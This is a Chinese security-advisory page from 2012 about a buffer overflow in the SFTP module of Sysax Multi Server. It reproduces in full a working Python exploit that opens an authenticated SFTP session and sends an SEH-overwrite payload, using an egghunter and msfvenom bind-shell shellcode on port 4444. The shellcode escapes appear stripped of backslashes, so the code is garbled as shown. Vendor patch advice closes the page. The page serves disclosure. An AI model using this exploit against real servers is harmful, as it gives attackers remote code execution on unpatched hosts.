Welcome 微信登录
编程资源 图片资源库 蚂蚁家优选 PDF转换器

首页 / 操作系统 / Linux / Sysax Multi Server SFTP模块缓冲区溢出漏洞

发布日期:2012-02-27
更新日期:2012-02-29受影响系统:
Codeorigin Sysax Multi Server 5.52
Codeorigin Sysax Multi Server 5.50
Codeorigin Sysax Multi Server 5.25
Codeorigin Sysax Multi Server 4.3
描述:
--------------------------------------------------------------------------------
BUGTRAQ  ID: 52191Sysax Multi Server是Windows平台下的SSH2和FTP服务器。Sysax Multi Server在实现上存在缓冲区溢出漏洞,攻击者可利用此漏洞执行任意代码。<*来源:Craig Freyman
 
  链接:http://www.pwnag3.com/2012/02/sysax-multi-server-ssh-username-exploit.html
*>测试方法:
--------------------------------------------------------------------------------警 告以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!#!/usr/bin/python
##########################################################################################################
#Title: Sysax Multi Server 5.53 SFTP Post Auth SEH Exploit (Egghunter)
#Author: Craig Freyman (@cd1zz)
#Tested on: XP SP3 32bit
#Software Versions Tested: 5.53
#Date Discovered: Febrary 22, 2012
#Vendor Contacted: Febrary 23, 2012
#Vendor Response: February 27, 2012
#Vendor Fix: Version 5.55
#Notes: Offset based on home path length. This exploit works for C:AAAAAAAAAAAAAAAA
#Complete Description: http://www.pwnag3.com/2012/02/sysax-multi-server-553-sftp-exploit.html
##########################################################################################################
import paramiko,os,sys
if len(sys.argv) != 5:
print "[+] Usage: ./filename <Target
IP> <Port> <User> <Password>"
sys.exit(1)
host = sys.argv[1]
port = int(sys.argv[2])
username = sys.argv[3]
password = sys.argv[4]
transport = paramiko.Transport((host, port))
transport.connect(username = username, password = password)
sftp = paramiko.SFTPClient.from_transport(transport)
# msfvenom -p windows/shell_bind_tcp LPORT=4444 -b "x00" -e x86/shikata_ga_nai
shell = ("DNWPDNWP"
"xdbxd9xbaxf9x77x28x1bxd9x74x24xf4x5ex29xc9"
"xb1x56x31x56x18x83xeexfcx03x56xedx95xddxe7"
"xe5xd3x1ex18xf5x83x97xfdxc4x91xccx76x74x26"
"x86xdbx74xcdxcaxcfx0fxa3xc2xe0xb8x0ex35xce"
"x39xbfxf9x9cxf9xa1x85xdex2dx02xb7x10x20x43"
"xf0x4dxcax11xa9x1ax78x86xdex5fx40xa7x30xd4"
"xf8xdfx35x2bx8cx55x37x7cx3cxe1x7fx64x37xad"
"x5fx95x94xadx9cxdcx91x06x56xdfx73x57x97xd1"
"xbbx34xa6xddx36x44xeexdaxa8x33x04x19x55x44"
"xdfx63x81xc1xc2xc4x42x71x27xf4x87xe4xacxfa"
"x6cx62xeax1ex73xa7x80x1bxf8x46x47xaaxbax6c"
"x43xf6x19x0cxd2x52xccx31x04x3axb1x97x4exa9"
"xa6xaex0cxa6x0bx9dxaex36x03x96xddx04x8cx0c"
"x4ax25x45x8bx8dx4ax7cx6bx01xb5x7ex8cx0bx72"
"x2axdcx23x53x52xb7xb3x5cx87x18xe4xf2x77xd9"
"x54xb3x27xb1xbex3cx18xa1xc0x96x2fxe5x0exc2"
"x7cx82x72xf4x93x0exfax12xf9xbexaax8dx95x7c"
"x89x05x02x7exfbx39x9bxe8xb3x57x1bx16x44x72"
"x08xbbxecx15xdaxd7x28x07xddxfdx18x4exe6x96"
"xd3x3exa5x07xe3x6ax5dxabx76xf1x9dxa2x6axae"
"xcaxe3x5dxa7x9ex19xc7x11xbcxe3x91x5ax04x38"
"x62x64x85xcdxdex42x95x0bxdexcexc1xc3x89x98"
"xbfxa5x63x6bx69x7cxdfx25xfdxf9x13xf6x7bx06"
"x7ex80x63xb7xd7xd5x9cx78xb0xd1xe5x64x20x1d"
"x3cx2dx50x54x1cx04xf9x31xf5x14x64xc2x20x5a"
"x91x41xc0x23x66x59xa1x26x22xddx5ax5bx3bx88"
"x5cxc8x3cx99")
egghunter = (
"x66x81xcaxffx0fx42x52x6ax02x58xcd"
"x2ex3cx05x5ax74xefxb8x44x4ex57x50"
"x8bxfaxafx75xeaxafx75xe7xffxe7")
nseh = "x90x90xebx08"
junk = "A" * 256
padding = "B" * (256 -len(junk) - len(shell))
seh = "xA1x47x92x5D" #5D9247A1 PPR RPCNS4.dll: *** SafeSEH unprotected ***
remotepath = junk + nseh + seh + "x90" * 10 + egghunter + "x90" * 1000 + shell + "x90" * 100
localpath = "/tmp/system.log"
print "============================================================================"
print "        Sysax Multi Server <= 5.53 SFTP Post Auth SEH Exploit (Egghunter)   "
print "                                  by cd1zz                                  "
print "                               www.pwnag3.com                               "
print "        Launching exploit against " + host + " on port " + str(port) + " for XP"
print "============================================================================"
sftp.get(remotepath, localpath)
sftp.close()
transport.close()建议:
--------------------------------------------------------------------------------
厂商补丁:Codeorigin
----------
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:http://www.ftpshell.com/index.htmLinux Kernel本地拒绝服务漏洞(CVE-2012-0810)Open Handset Alliance Android Browser远程代码执行漏洞相关资讯      Sysax Multi Server 
  • Sysax Multi Server函数缓冲区溢出  (08/01/2012 06:59:25)
  • Sysax Multi Server “uploadfile_  (02/11/2012 12:53:48)
  • Sysax Multi Server "username"字  (03/01/2012 07:01:16)
本文评论 查看全部评论 (0)
表情: 姓名: 字数


评论声明
  • 尊重网上道德,遵守中华人民共和国的各项有关法律法规
  • 承担一切因您的行为而直接或间接导致的民事或刑事法律责任
  • 本站管理人员有权保留或删除其管辖留言中的任意内容
  • 本站有权在网站内转载或引用您的评论
    版权所有©石家庄振强科技有限公司2024 冀ICP备08103738号-5 网站地图